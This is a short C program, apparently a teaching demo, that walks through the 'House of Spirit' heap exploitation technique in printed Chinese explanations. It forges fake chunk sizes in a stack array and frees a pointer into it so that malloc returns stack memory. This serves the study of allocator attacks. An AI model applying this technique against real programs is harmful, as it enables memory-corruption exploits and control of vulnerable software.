#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    puts("所以我们将讨论一下 Spirit 攻击的实现。");
    puts("Spirit 攻击允许我们让 malloc 返回一个虚假的块到一个我们部分控制的区域（比如 bss 或栈）中。");
    puts("为了让这个攻击生效并通过所有 malloc 的检查，我们需要创建两个虚假的块。");
    puts("为了设置这些虚假块，我们需要写入虚假的块大小值。");
    puts("第一个虚假块也是我们希望 malloc 返回的块的位置。");
    puts("让我们开始吧！\n");

    unsigned long array[20];
    printf("首先，我们在栈上初始化了一个数组。\n");
    printf("数组起始地址：%p\n", array);
    printf("我们的目标是在地址 %p 处分配一个块。\n\n", &array[2]);

    printf("现在我们需要写入两个块的大小值。\n");
    printf("有三个限制条件我们需要满足：\n\n");

    printf("0.) 块的大小必须在快速块范围内。\n");
    printf("1.) 大小值必须放在它们应该放置的位置，就像它们是真实的块一样。\n");
    printf("2.) 第一个堆块（被释放和重新分配的那个）的大小必须与我们想要分配虚假块的 malloc 的堆大小四舍五入后的大小相同，应该大于传递给 malloc 的参数。\n\n");

    printf("另外需要注意的是，这两个大小值不一定要相等。\n");
    printf("查看代码注释，了解虚假堆块的结构。\n");
    printf("现在，让我们写入这两个大小值。\n\n");

    /*
    这将是我们两个虚假块的结构：
    假设你是为 x64 编译的

    +-------+---------------------+------+
    | 0x00: | Chunk # 0 prev size | 0x00 |
    +-------+---------------------+------+
    | 0x08: | Chunk # 0 size      | 0x60 |
    +-------+---------------------+------+
    | 0x10: | Chunk # 0 content   | 0x00 |
    +-------+---------------------+------+
    | 0x60: | Chunk # 1 prev size | 0x00 |
    +-------+---------------------+------+
    | 0x68: | Chunk # 1 size      | 0x40 |
    +-------+---------------------+------+
    | 0x70: | Chunk # 1 content   | 0x00 |
    +-------+---------------------+------+

    对于我们的目的，前一块大小的值不太重要
    重要的是虚假块的堆头大小值
    */

    array[1] = 0x60;
    array[13] = 0x40;

    printf("现在我们设置好了虚假块，接下来我们将获得一个指向第一个虚假块的指针。\n");
    printf("这将是我们在这次攻击中要求 malloc 返回的指针。\n");

    unsigned long *ptr;
    ptr = &(array[2]);

    printf("地址：%p\n\n", ptr);

    printf("现在我们将释放这个指针以将其放入快速块中。\n");

    free(ptr);

    printf("现在我们只需分配一个块，它的四舍五入 malloc 大小将等于我们虚假块的大小（0x60），我们应该让 malloc 返回一个指向 array[1] 的指针。\n\n");

    unsigned long *target;
    target = malloc(0x50);

    printf("返回的指针：%p\n", target);
}
